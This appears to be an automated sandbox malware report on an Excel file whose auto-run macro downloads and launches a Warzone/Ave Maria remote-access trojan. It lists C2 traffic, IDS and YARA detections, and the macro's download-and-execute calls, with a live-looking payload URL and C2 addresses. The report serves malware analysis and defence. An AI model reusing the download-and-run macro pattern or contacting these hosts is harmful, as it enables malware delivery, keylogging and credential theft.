                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49213
                Source: global trafficTCP traffic: 192.168.2.22:49213 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49213
                Source: global trafficTCP traffic: 192.168.2.22:49213 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49214 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49214
                Source: global trafficTCP traffic: 192.168.2.22:49214 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49214
                Source: global trafficTCP traffic: 192.168.2.22:49214 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49215 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49215
                Source: global trafficTCP traffic: 192.168.2.22:49215 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49215
                Source: global trafficTCP traffic: 192.168.2.22:49215 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49216 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49216
                Source: global trafficTCP traffic: 192.168.2.22:49216 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49216
                Source: global trafficTCP traffic: 192.168.2.22:49216 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49217 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49217
                Source: global trafficTCP traffic: 192.168.2.22:49217 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49217
                Source: global trafficTCP traffic: 192.168.2.22:49217 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49218 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49218
                Source: global trafficTCP traffic: 192.168.2.22:49218 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49218
                Source: global trafficTCP traffic: 192.168.2.22:49218 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49219 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49219
                Source: global trafficTCP traffic: 192.168.2.22:49219 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49219
                Source: global trafficTCP traffic: 192.168.2.22:49219 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49220 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49220
                Source: global trafficTCP traffic: 192.168.2.22:49220 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49220
                Source: global trafficTCP traffic: 192.168.2.22:49220 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49221 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49221
                Source: global trafficTCP traffic: 192.168.2.22:49221 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49221
                Source: global trafficTCP traffic: 192.168.2.22:49221 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49222 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49222
                Source: global trafficTCP traffic: 192.168.2.22:49222 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49222
                Source: global trafficTCP traffic: 192.168.2.22:49222 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49223 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49223
                Source: global trafficTCP traffic: 192.168.2.22:49223 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49223
                Source: global trafficTCP traffic: 192.168.2.22:49223 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49224 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49224
                Source: global trafficTCP traffic: 192.168.2.22:49224 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49224
                Source: global trafficTCP traffic: 192.168.2.22:49224 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49225 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49225
                Source: global trafficTCP traffic: 192.168.2.22:49225 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49225
                Source: global trafficTCP traffic: 192.168.2.22:49225 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49226 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49226
                Source: global trafficTCP traffic: 192.168.2.22:49226 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49226
                Source: global trafficTCP traffic: 192.168.2.22:49226 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49227 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49227
                Source: global trafficTCP traffic: 192.168.2.22:49227 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49227
                Source: global trafficTCP traffic: 192.168.2.22:49227 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49228 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49228
                Source: global trafficTCP traffic: 192.168.2.22:49228 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49228
                Source: global trafficTCP traffic: 192.168.2.22:49228 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49229 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49229
                Source: global trafficTCP traffic: 192.168.2.22:49229 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49229
                Source: global trafficTCP traffic: 192.168.2.22:49229 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49230 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49230
                Source: global trafficTCP traffic: 192.168.2.22:49230 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49230
                Source: global trafficTCP traffic: 192.168.2.22:49230 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49231 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49231
                Source: global trafficTCP traffic: 192.168.2.22:49231 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49231
                Source: global trafficTCP traffic: 192.168.2.22:49231 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49231
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49231
                Source: global trafficTCP traffic: 192.168.2.22:49231 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49232 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49232
                Source: global trafficTCP traffic: 192.168.2.22:49232 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49232
                Source: global trafficTCP traffic: 192.168.2.22:49232 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49233 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49233
                Source: global trafficTCP traffic: 192.168.2.22:49233 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49233
                Source: global trafficTCP traffic: 192.168.2.22:49233 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49234 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49234
                Source: global trafficTCP traffic: 192.168.2.22:49234 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49234
                Source: global trafficTCP traffic: 192.168.2.22:49234 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 192.168.2.22:49235 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49235
                Source: global trafficTCP traffic: 192.168.2.22:49235 -> 87.120.121.160:5220
                Source: global trafficTCP traffic: 87.120.121.160:5220 -> 192.168.2.22:49235
                Source: global trafficTCP traffic: 192.168.2.22:49235 -> 87.120.121.160:5220

                Networking

                barindex
                Source: Network traffic | Suricata IDS: 2036735 - Severity 1 - ET MALWARE Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) : 87.120.121.160:5220 -> 192.168.2.22:49231
                Source: Network traffic | Suricata IDS: 2852326 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT InitializePacket : 87.120.121.160:5220 -> 192.168.2.22:49231
                Source: Network traffic | Suricata IDS: 2036734 - Severity 1 - ET MALWARE Ave Maria/Warzone RAT Encrypted CnC Checkin : 192.168.2.22:49231 -> 87.120.121.160:5220
                Source: Network traffic | Suricata IDS: 2852327 - Severity 1 - ETPRO MALWARE Ave Maria/Warzone RAT BeaconResponse : 192.168.2.22:49231 -> 87.120.121.160:5220
                Source: Malware configuration extractor | URLs: dns.stipamana.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_004027D3 URLDownloadToFileW,ShellExecuteW, | 6_2_004027D3
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 87.120.121.160:5220
                Source: Joe Sandbox View | IP Address: 87.120.121.160 87.120.121.160
                Source: Joe Sandbox View | IP Address: 94.156.167.55 94.156.167.55
                Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: global traffic | HTTP traffic detected: GET /sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_0040D0A3 recv, | 6_2_0040D0A3
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exe
                Source: global traffic | HTTP traffic detected: GET /sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive
                Source: global traffic | DNS traffic detected: DNS query: www.stipamana.com
                Source: global traffic | DNS traffic detected: DNS query: dns.stipamana.com
                Source: VPZVQXDUT.exe | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
                Source: VPZVQXDUT.exe, 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, VPZVQXDUT.exe, 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, msimages.exe, 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, msimages.exe, 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, msimages.exe, 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, msimages.exe, 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
                Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknown | HTTPS traffic detected: 94.156.167.55:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_004089D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx, | 6_2_004089D5
                Source: VPZVQXDUT.exe, 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: GetRawInputDatamemstr_6cf35796-b

                E-Banking Fraud

                barindex
                Source: Yara match | File source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: 4.2.VPZVQXDUT.exe.3fb01e0.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 4.2.VPZVQXDUT.exe.2783860.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 11.2.msimages.exe.29b1654.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 14.2.msimages.exe.29af650.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: AveMaria_WarZone Author: unknown
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: Estado.de.cuenta.xls | OLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set WshShell = CreateObject("WScript.Shell") | Name: Workbook_Open
                Source: Estado.de.cuenta.xls | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, savetofile, write
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API IXMLHTTPRequest.Open("get","https://www.stipamana.com/sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe",False) | Name: Workbook_Open
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API Stream.Open() | Name: Workbook_Open
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API Stream.Write([raw binary payload, garbled in extraction, omitted]) | Name: Workbook_Open
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API IShellDispatch6.Open("C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe") | Name: Workbook_Open
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, found possibly 'ADODB.Stream' functions open, savetofile, write | Name: Workbook_Open
                Source: Estado.de.cuenta.xls | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send | Name: Workbook_Open
                Source: Estado.de.cuenta.xls | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
                Source: VBA code instrumentation | OLE, VBA macro: Module ThisWorkbook, Function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd, String ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Memory allocated: 770B0000 page execute and read and write
                Source: C:\ProgramData\msimages.exe | Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A65A8 NtWriteVirtualMemory
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A6258 NtReadVirtualMemory
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A6700 NtSetContextThread
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A6388 NtResumeThread
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A65A0 NtWriteVirtualMemory
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A6250 NtReadVirtualMemory
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A66F9 NtSetContextThread
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A6381 NtResumeThread
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_004465A8 NtWriteVirtualMemory
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_00446258 NtReadVirtualMemory
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_00446700 NtSetContextThread
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_00446388 NtResumeThread
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_004465A0 NtWriteVirtualMemory
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_004466F9 NtSetContextThread
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C65A8 NtWriteVirtualMemory
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C6258 NtReadVirtualMemory
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C6700 NtSetContextThread
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C6388 NtUnmapViewOfSection
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C65A0 NtWriteVirtualMemory
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C6250 NtReadVirtualMemory
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C66F9 NtSetContextThread
                Source: C:\ProgramData\msimages.exe | Code function: 14_2_001C6381 NtUnmapViewOfSection
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A6850
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A4A69
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A1EC9
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A0B08
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A4358
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A57A0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A403F
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A4050
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 4_2_001A5794
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_00411BF8
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_00446851
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_00444A69
                Source: C:\ProgramData\msimages.exe | Code function: 11_2_00441EC9
